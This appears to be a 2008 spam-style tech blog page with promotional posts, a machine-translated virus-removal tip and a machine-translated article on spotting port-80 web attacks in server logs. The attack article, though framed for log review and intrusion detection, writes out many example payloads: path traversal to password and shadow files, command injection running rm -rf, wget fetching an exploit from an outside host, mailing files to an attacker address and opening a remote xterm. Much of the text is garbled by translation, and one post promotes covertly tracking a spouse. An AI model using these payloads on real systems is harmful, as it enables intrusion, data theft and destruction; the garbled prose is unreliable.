Weblog

Computer Technology
Computers and Technology
MY PROFILE
Name: Computer Technology
Location:

RECENT POSTS
Spy Gear for Nanny Cams and Hidden Cameras
Why Cleanup Registry Issues?
HCL Laptops--The gadgets which bring the world at your feet
Can not remove the virus treatment
80 port web of service attack marks
ARCHIVES
November 23, 2008
November 16, 2008
November 09, 2008

Spy Gear for Nanny Cams and Hidden Cameras

Spy Gear for Nanny Cams and Hidden Cameras

One of the main reasons for using a hidden camera or nanny cam is for the protection of your children. However there are many other reasons to check on a cheating spouse, to keep an eye on your teenage children or to just watch out for the security and safety of your home.

The hidden camera or nanny cam can be used for security reasons, when you are away, have a house sitter or maybe someone in your home doing repairs or even house cleaning.A lot of people are even using hidden cameras and nanny cams in their vacation homes, their business and in nursing homes to watch over their parents and loved ones.You can even purchase a hidden camera or nanny camera with Internet access to watch you home or business when you are away.

A lot of business such as doctors, lawyers, dentist and even hospitals are using these hidden cameras to watch over their assets and places of business.Most daycare centers have some kind of hidden cameras or nanny cams so that parents have the ability to check up and watch their children while they are at work. This makes leaving your child at daycare a little easier.

The nanny cams and hidden cameras are easy to install and use so that anyone can use them. They come in a variety of items such as wall clocks, boom boxes, cube clocks, plants and many more.

And yes it is legal to use a hidden camera in all 50 states. However it is illegal to record the audio speech of someone without their consent in the following 15 states: California, Connecticut, Delaware, Florida, Hawaii, Illinois, Louisiana, Maryland, Massachusetts, Montana, Nevada, New Hampshire, Oregon, Pennsylvania and Washington.These hidden cameras and nanny cams are very cost effective for around $500.00 or a little more you can have peace of mind about your family, your home and your business.

Spy gear is now available is such a vast and wide variety that there is something for everyone. Even the Gyps units are great for keeping track of someone such as a cheating spouse, teenage driver or a child that leaves for the weekend with another parent or adult.


Posted by Computer Technology AT 11/26/2008 10:53 AM  |  0 comments  |  post a comment  |  digg it

Why Cleanup Registry Issues?

During the normal course of operation, most people do not give much thought to their pc’s registry, let alone any of the inner workings of the computer. That everything works and works rapidly is significantly more important.

Normal operation, though, has an effect on pc performance. Over time, performance degrades and a pc optimizer is needed to provide a tune up of sorts to speed up pc operation.

What is the registry anyway?

The registry is part of a pc’s operating system. It is a directory that contains system settings and options.

When functioning properly, directions from the registry are rapidly conveyed to the CPU as part of normal operation. When issues arise in the registry, however, pc performance degrades significantly, causing it too slow down noticeably. In order to reverse the problem and optimize pc performance when this happens, it is necessary to cleanup registry issues thoroughly.

How do registry issues start in the first place?

Normal wear and tear on any machine takes a toll, and computers are no exception. Every time new hardware is added to your system, the registry is updated. Every time software is installed or uploaded, the registry is updated. Files downloaded from the Internet, configuration changes to software applications or hardware have the same effect. These changes are not always compatible and not always cleanly done.

The only way to clear out incompatibilities, file corruption or extraneous data and optimize pc performance is to cleanup registry contents.

When is it time to cleanup registry issues?

There are a few common symptoms that indicate it’s time to cleanup registry problems. Some common issues are:

• Software freezing up
• Software that doesn’t load
• Significantly slowed operation
• System crash
• Frequent system errors


How can a registry get cleaned out?

It’s not necessary to be a computer expert to fix registry issues. On the contrary, registry cleaning software automates and greatly simplifies the process. In fact, the best registry cleaners actually act as a pc optimizer. Most programs back up your system settings, scan for problems and then repair them. The best registry cleaners, though, offer even more functionalities that help speed up pc performance. These features can include disc defragmentation and selectively removing applications from system startup, both of which result in noticeable improvements in performance.


Posted by Computer Technology AT 11/26/2008 10:51 AM  |  0 comments  |  post a comment  |  digg it

HCL Laptops--The gadgets which bring the world at your feet

Laptops have made our work much more simpler than it was, because with your personal computer one has to sit in front and it needs electricity facility. But with your Laptop, your do not have to wait for electricity; just charge it once then you can use it for the whole day. HCL Laptops come with advanced features, which allow the user to work on them freely without taking any pain.

HCL laptops are the best devices which allow the user to carry it with himself easily. Now-a days HCL Desk laptops are coming in various varieties, which allow the user to make their work as simple as it can. Laptops are the best way by which the user can work out of his office or the room. In these days, laptops offer a higher degree of flexibility and features and more values than a traditional personal computer.

In modern days, laptops have become very popular among new generation as it consume less time and easy to carry anywhere with you. In the present scenario, cheap laptops are also available with nice quality. Laptops are easy to carry because they hardly weighs only 1 to 8 kilograms and are easy to carry anywhere.

Laptops are available in many variates, cheap as well as higher quality. Now we can processed with other branded laptops, which can be easily handled and the user can work on them while busy in other work. HCL, SONY, DEL are some of the best branded companies whose laptops are popular all over the country. HCL Laptops are available in small as well as bigger size; also it depends on the choice of the user which he/she prefers. To collect more information regarding laptop, consumers are free to search on websites. On the Internet there are various websites which will provide you full information about laptops.

Posted by Computer Technology AT 11/26/2008 10:50 AM  |  0 comments  |  post a comment  |  digg it

Can not remove the virus treatment

With the limited time the popularity of broadband, for the convenience of BT download, a lot of friends love the 24-hour hang. The round-the-clock on-line, which for a number of viruses, Trojan horse "invasion" of the system has brought great convenience, in the middle of the night they invaded our computers, all kinds of evil things deliberately. I said in the past to help a friend Anti-Virus, on the face of a "can not remove the virus", following the killing of experience to share with you.
1. Jingxian virus. A friend's computer to install the Windows XP Professional Edition, recently often through the night with the boot BT download movies, did not expect at a boot time, Norton virus found in the next report on the "exporer.exe", but the use of Norton scan, although the virus can be found However, Norton can not be prompted to isolate and remove the virus files.

2. Killing. In general, if the virus can not be directly deleted, mostly because of the virus in the process leading to the run to open the Task Manager, find the process of the virus "exporer.exe" to the successful termination, in accordance with the provision of Norton virus path of the file, the virus found documents , Hold down the Shift key to select right-click the "delete" It is strange that the system has not prompted to delete files, open the Task Manager again, I have been convinced that the process of termination of the virus, but is not written in the protection of the state, why can not delete? Me Trying to delete a folder, but the same system was rejected several times to restart the computer remains the same result.

Later in my view "exporer.exe" attributes (look at the document said formation and size of the period, in order to search his associates did not have the virus), attributes the accident found that a window of "security" tab, click the user can see A list of rights "special rights" to refuse the option was marked wilsonii, the document will not lead to competence can not be removed? Click the "Advanced" button in the pop-up window, I saw a "refusal to delete" authority, Click the "edit" at last to see deleted files can not be the real reason for the original permission to delete the current user facilities were set up for the drug turned down, but it allowed "to read and run, refused to cancel the authority, the return of file attributes window , Check "to allow full control", click "OK" after successfully deleted from the "exporer.exe".

Tips

Files (folder) attributes the "security" label only in the NTFS format partition, If you do not see the label, open My Computer, click "Tools ? Options ? folder view", and then in the Advanced Settings option Under the removal of "simple file sharing (Recommended)" before the wilsonii.

I deleted the "exporer.exe" after trying to delete a folder, the system was rejected by the folder to view the "security" attributes, can be found in the same authority to remove (delete files and subfolders, and delete) have been rejected, ibid , To remove the restrictions on smoothly after the virus "swept aside to benefit." The document (folder), if as a result of the reasons was refused permission to operate, the general authority will be set to "complete control" can be.

Tips

(1) rights can be inherited, sometimes to open a file security attributes label, in Figure 4 may not have "refused to delete" authority, but if it's the parent folder set up, "refused to delete files and subfolders "This document can not be removed, a solution is to file permissions set to full control.

(2) file permissions and the file owner is associated, for the Office of the multi-computer accounts, some people with ulterior motives may correspond to the user and the Trojans will be up (for computer operation so as to lower the level of accounts, vigilance not easy to steal information ), If the horse was found drugs and associated with the corresponding account, that is, some users log on after the horse will run, while others do not (Trojan file permissions set to read and delete the prohibited), this system can be logged on as an administrator, Horse owners will be forced to change the document for the current user, and then set to full control of the horse will be deleted.

(3) a little experience. Windows XP/2000 documents (folder) permission, the system is a special feature that allows flexibility to set different permissions for different users, a number of horses who passed the virus program file is set to be allowed "to read and run" and refused "to remove "In order to better achieve the" self-protection. " As the file permissions to change the operation of complex facilities are generally poison to host hands-on, the favorite hang-weather friend to install a good firewall protection, shut down unnecessary ports, and can effectively prevent the recurrence of such virus The attack, if the virus can not be removed in the process of termination of the case, we must look at whether the file permissions have been changed.
For more information visit: 73zz.com


Posted by Computer Technology AT 11/16/2008 6:34 AM  |  0 comments  |  post a comment  |  digg it

80 port web of service attack marks

By:73zz.com
web site services for the default port 80 on its range of security issues continue to release, and even some of the loopholes allow an attacker to obtain permission to enter the system administrator in-house site, Zenomorph The following are some of the 80 ports on the way to attack the traces of Research, and how to tell you from logging problems found.
[Described in detail]
Some parts of the following examples, the display on their web servers and on the universal application of the attack, and the marks left by these examples represent only a major attack on the way, did not list all the forms of attack, which will be part of the A detailed description of each attack, and how to use these loopholes to carry out attacks.

(1) "." ".." And the request "..."
Traces of these attacks is very common for web applications and web servers, which allow for an attacker or a worm program to change the path of the web server, access to a private visit to the region. CGI most of the loopholes in the procedures for containing any of them, ".." request.
Example:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
The examples show the attacker mosd the request of the document, if the attacker have the ability to break through the root of the web server, then access to more information and to obtain additional privileges.

(2) "% 20" request
20% of the space that is the value of M 16, although this does not mean that you can use anything, but when you view the log will find it, a number of web servers running on the application of this character might be an effective implementation of the Therefore, you should carefully check the log. On the other hand, the request can sometimes help implement some of the orders.
Example:
http://host/cgi-bin/lame.cgi?page=ls% 20-al ¦
The examples show the attacker carried out a unix command to set out a whole list of requests for documents, leading to the attacker access your important system files, to help him get the privilege to provide further conditions.

(3), "" request
16, said the M-byte space, he can be used to fool web applications and requests for different types of documents.
Examples:
http://host/cgi-bin/lame.cgi?page=index.html
This may be a valid request for this machine, if the attacker took note of the success of this action request, he will find the cgi program.
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
Perhaps the cgi program does not accept this request because it wants to check the documents of the request suffix, such as: html.shtml or other types of files. Most of the program will tell you the requested file type is invalid, and this time it will tell the attacker's request for documents has to be a character of a suffix of file types, so that an attacker access to the path of the system, the file name, resulting in Your system more sensitive information
http://host/cgi-bin/lame.cgi?page=../../../../etc/motdhtml
This attention to the request, it will cheat cgi program that the document is acceptable to determine the types of documents, some of the applications because of stupid effective inspection at the request document, which is commonly used attacker.

(4) "¦" request
This is a pipe character in unix system in a request for help in the implementation of a number of systems ordered at the same time.
Example:
# Cat access_log ¦ grep-i ".."
(This command will be displayed in the log ".." request, commonly used in the attack and found the worm attack)
Often can see a lot of web applications with the characters, which led to the IDS false alarm log.
You are in the process of careful examination, this is good, you can reduce the error in the intrusion detection alarm system.
Some examples are given below:
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls ¦
The request for the implementation of the order, the following are some examples of changes
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls% 20-al% 20/etc ¦
At the request of the unix systems listed in / etc directory of all documents
http://host/cgi-bin/lame.cgi?page=cat% 20access_log ¦ grep% 20-i% 20 "lame"
The request for an order of cat and grep implementation of the order will be implemented, the query "lame"

(5) ";" request
In unix systems, the number of characters allowed in order to implement his party
Example:
# Id; uname-a
(Id implementation of the order, followed by the implementation of the command uname)
Some of the procedures used in this web of characters, may result in your IDS warned that the failure of the log, you should carefully check your web procedures, so that your IDS reduce the probability of failure of the alarm.

(6), "" request
You should check the log records of these two characters, a large number of reasons, first and foremost this is a show that the characters in the document to add data
Example 1:
# Echo "your hax0red h0 h0">> / etc / motd (written request for information in this document motd)
An attacker can easily use the above as you tamper with the request of the web page. For example, a well-known RDS exploit the attacker is often used to change the web page.
Example 2:
[url = http://host/something.php=Hi% 20mom% 20Im% 20Bold! Hi% 20mom% 20Im% 20Bold!
Html here, you will notice a sign language that he used the same "<",">" characters, such attacks can not lead to an attacker access to the system, which confused people think this is a legitimate information in the web site (lead People visit this link to visit the attacker's address settings, such requests may be converted into 16-band code character forms, so that the attack marks a less obvious)

7) "!" Request
Such characters commonly used language on the request of the SS (Server Side Include) I carried out the attack, the attacker confused the attacker was a user clicks on the link set, and the same as above.
Example:
http://host1/something.php ="-->
Liezi the attacker is likely to do it so that a site host2 documents appeared to come from above host1 (Of course, visitors need to visit the attacker was set by the association. Such a request could be transformed into 16-band code disguised and difficult to find)
At the same time, in this way can also use it to the web site permission to implement an order
Example:
http://host/something.php ="-->
The examples in the implementation of the system's long-range "id" of the order, it will show the web site's user id, usually "nobody" or "www"
This form also contains hidden files allowed.
Example:
http://host/something.php ="-->
The hidden files. Htpasswd will not be displayed, Apache will refuse to establish the rules to this. Ht in the form of the request, and SSI signs that will bypass the restrictions and lead to security problems

(8) "
In some simple php applications, it may be in the long-range systems to web site users to the local authority to implement an order

(9) "` "request
Such characters commonly used in the back of perl in the implementation of the order, the characters in the web application is not often used, so if you see it in the log should be very careful
Example:
http://host/something.cgi = `id`
Wrote a perl problem cgi program will lead to the implementation of an order id
[More]
The following discussion will be part of the attacker more likely to implement the order, together with the requested documents, and if you have long-range order to implement the defect, how to check it found. This is just part of the give you a good idea, and you tell the system what happened, the attacker tried to attack your system marks, but it does not list all of the attacker's command and the use of the request.
"/ bin / ls"
The request for an order of the entire path, in many web applications have this loophole, if you log in many places this request, the possibility is very remote there are loopholes in the implementation of the order, but not necessarily a problem , Or it may be a mistake of warning. Once again, to remind, web applications written (cgi, asp, php ... etc) is the basis of security
Example:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls% 20-al ¦
http://host/cgi-bin/bad.cgi?doh=ls% 20-al;
"cmd.exe"
This is a windows of the shell, if an attacker access and run this script, the server set up to allow conditions in the windows machine can do anything, many of the worm through 80 ports, spread to the remote machine
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir + e:
"/ bin / id"
This is a band 2 of the document, its problems and / bin / ls, if you log in many places this request, the possibility is very remote there are loopholes in the implementation of the order, but not necessarily a problem , Or it may be a mistake of warning.
It will show which belong to the users and which belong to the group
Example:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id ¦
http://host/cgi-bin/bad.cgi?doh=id;
"/ bin / rm"
This command can delete files, if the incorrect use is very dangerous
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm% 20-rf% 20 * ¦
http://host/cgi-bin/bad.cgi?doh=rm% 20-rf% 20 *;
"wget and tftp" order
These orders are often used to download the attacker may be further privileged documents, wget is under unix command may be used to download a backdoor program, tftp and unix is nt under the command used to download files. Tftp through a number of IIS worm to spread the virus to copy itself to other hosts
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget% 20http: / / host2/Phantasmp.c ¦ http:// host / cgi-bin / bad.cgi? doh = wget% 20http: / / www.hwa-security.net/Phantasmp.c;
"cat" command
The order to view the contents of the paper used to read important information such as profiles, password files, documents and credit cards that you can think of a document
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat% 20/etc/motd ¦ http://host/cgi-bin/ bad.cgi? doh = cat% 20/etc/motd;
"echo" command
The commonly used in order to write data to a file, such as "index.html"
Examples:>% 200day.txt '> http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo% 20 "fc-# kiwis% 20was% 20here "% 20>>% 200day.txt ¦>% 200day.txt '> http://host/cgi-bin/bad.cgi?doh=echo% 20" fc-# kiwis% 20was% 20here "% 20> >% 200day.txt;
"ps" command
The list currently running process, told the attacker to run those remote host software, in order to get some idea of security issues, further powers
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps% 20-aux ¦ http://host/cgi-bin/bad. cgi? doh = ps% 20-aux;
"kill and killall" order
Unix systems in order to kill the process, an attacker can use this command to stop service system and procedures at the same time can erase the traces of the attacker, some would exploit a lot of sub-process
Examples: http://host/cgi-bin/bad.cgi?doh=../bin/kill% 20-9% 200 ¦ http://host/cgi-bin/bad.cgi?doh=kill% 20 -9% 200;
"uname" order
The attacker remote command to tell the name of the machine, some of the time, this web site is located in order to know which isp, perhaps the attacker had visited today. Uname-a usually to a request, which will be recorded in the log file
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname% 20-a ¦ http://host/cgi-bin/bad. cgi? doh = uname% 20-a;
"cc, gcc, perl, python, etc ..." compiler / explanation of the order
The attacker through wget or tftp download exploit, and cc, gcc to compile such a procedure compiled into an executable program, and further access to privileges
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc% 20Phantasmp.c ¦ http://host/cgi-bin/bad. cgi? doh = gcc% 20Phantasmp.c;. / a.out% 20-p% 2031337;
If you view the log found "perl" python "these instructions may be a remote attacker to download the perl, python script, and tried to get local privileges
"mail" command
The attacker usually use this system to order some of the important documents issued to the attacker's own mailbox, and is willing to carry out e-mail bomb attacks
Examples: [url = http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail% 20attacker@fuckcnhonker.org% 20
"xterm / other X applications," an order
xterm used to obtain long-range machine of the shell, if you log in you found these symbols, happen a careful analysis of your system may have been a security breach. Attention in the log to find "% 20-display% 20" characters this, which usually marks the start xterm on the remote machine or X applications
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../usr/X11R6/bin/xterm% 20-display% 20192.168.22.1 ¦ http:// host / cgi-bin / bad.cgi? doh = Xeyes% 20-display% 20192.168.22.1;
"chown, chmod, chgrp, chsh, etc ..." and so on command
Unix systems in order to allow them to change the file permissions permission
chown = set up to allow the owner of the file chmod = allowed to set file permissions permission chgrp = group be allowed to change the document owner powers chsh = allows the user to change the shell
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod% 20777% 20index.html ¦ http://host/cgi-bin/ bad.cgi? doh = chmod% 20777% 20index.html; http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown% 20zeno% 20 / etc / master.passwd ¦ http://host/cgi-bin/bad.cgi?doh=chsh% 20/bin/sh; http://host/cgi-bin/bad.cgi?doh=../. . / .. / .. / bin / chgrp% 20nobody% 20/etc/shadow ¦
"/ etc / passwd" file
This is the system password file, is a shadow over the general, and not allowed to see the encrypted password, but on the attacker, who can know it is a valid user, as well as the system's absolute path name of the site, and other information, usually due to The shadow had been, so an attacker, usually to see / etc / shadow file
"/ etc / master.passwd"
This document is a BSD system password file, containing encrypted password, the file on the root account is only read-only, and the number of unskilled attacker, he tried to open it to read. If the web site is root privileges to run, then for the attacker, will be able to read it, a lot of problems for the system administrator will follow
"/ etc / shadow"
Contains encrypted password system, the root account on the same CD, and / et / master.passwd almost
"/ etc / motd"
When the user into the landing system unix emerging information on the "Message of the Day" in the document, which provides important information and systems administrator for the user to set the number of those users is to see that those who are not also The system contains a version of the information, usually an attacker to view the file, to understand what the system is running on the attacker, the next step is to search for this type of system, exploit, and further access to the system privileges
"/ etc / hosts"
The documents provided by ip address and information network, an attacker can learn more about the system's network settings
"/ usr / local / apache / conf / httpd.conf"
This is the Apache web server configuration file, an attacker can understand, such as cgi, ssi, and other information is available at
"/ etc / inetd.conf"
This is the inetd service profile, an attacker can understand the long-range machine to start those services, whether or not to use the wrapper for access control, if the wrapper is running, the next step will inspect attacker "/ etc / hosts.allow" and " / etc / hosts.deny ", documents, and there may be changes to some of the settings, access to privileges
". htpasswd,. htaccess, and. htgroup"
These documents are usually in the web site for user authentication, an attacker will have to see these documents and to obtain a user name and password, the password file. Htpasswd encrypted, to break through some simple procedures to decrypt, so that those who visit the site of attack Protected areas (usually the user to use the same username and password, and the attacker could otherwise account for a visit)
"access_log and error_log"
These are the apache server's log files, the attacker will often see these documents to see if those requests were recorded, and those of other requests for different places
Typically, the attacker will modify these log files, such as his own address information, the attackers break through the 80 ports of your system and your system does not back up, there is no other record of the proceedings recording system status, which will Intrusion detection work is very difficult to change the
"[drive-letter]: winntrepairsam._ or [drive-letter]: winntrepairsam"
Windows NT file system password, if the long-range order can not be implemented, the attacker will usually request these documents, and then through the "l0pht crack" like password cracking tools to crack, if the attacker tried to attack the administrator password file, if successful Then the remote machine will be brought under control right attacker
[Overflow analysis]
In this article I will not say too much in the overflow on the topic, I will give out those phenomena and marks and special attention should be noted, are often attacked buffer attacker through the code conversion and other means to achieve difficult to find
The following is a simple Liezi
Example: http://host/cgi-bin/helloworld?type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA
The examples show the attacker to send an application for a lot of the characters A, to test the procedure buffer overflow, the buffer overflow remote host will be the order of implementation of the authority, if the case is a setuid and the main root for the procedure adopted by the spill, Can access the system as a whole, if not setuid such procedures, the overflow is only running to be the web site of user rights
There can not be all about, but you should have regular check of your log file, if that day all of a sudden found that many of the requests, and usually not more than the request, then you are subject to overflow attacks and, of course, may be A new Internet worm attack
[Code conversion]
All of the above-mentioned request of the attack, the attacker is usually known IDS system of regular mechanical check request, usually an attacker to use data conversion tool to the requested content into a 16-band format, IDS will lead to ignore those requests, We are familiar with CGI's Whisker vulnerability scanning tool that is a very good examples. If you log in to see a lot of time to find the 16-band and a number of unusual characters, then the attacker may try to use some of the ways to attack your system
A quick way to find is that your log file in 16 of those band's request to copy your browser, the browser can be transformed into a proper request and show the contents of the request, if you do not Run the risk of a simple man ASCII, you can provide the correct code.
[Conclusion]
This article can not cover all the 80 ports of the attack, but has listed more than most general way to attack the same time, to tell you how to check your log files, and how to increase as some of the IDS rules, to write her aim to web administrator should be concerned about what a good idea, at the same time, I hope this article will help to the process of web developers to write better web program.
For more information visit: 73zz.com


Posted by Computer Technology AT 11/15/2008 5:15 AM  |  0 comments  |  post a comment  |  digg it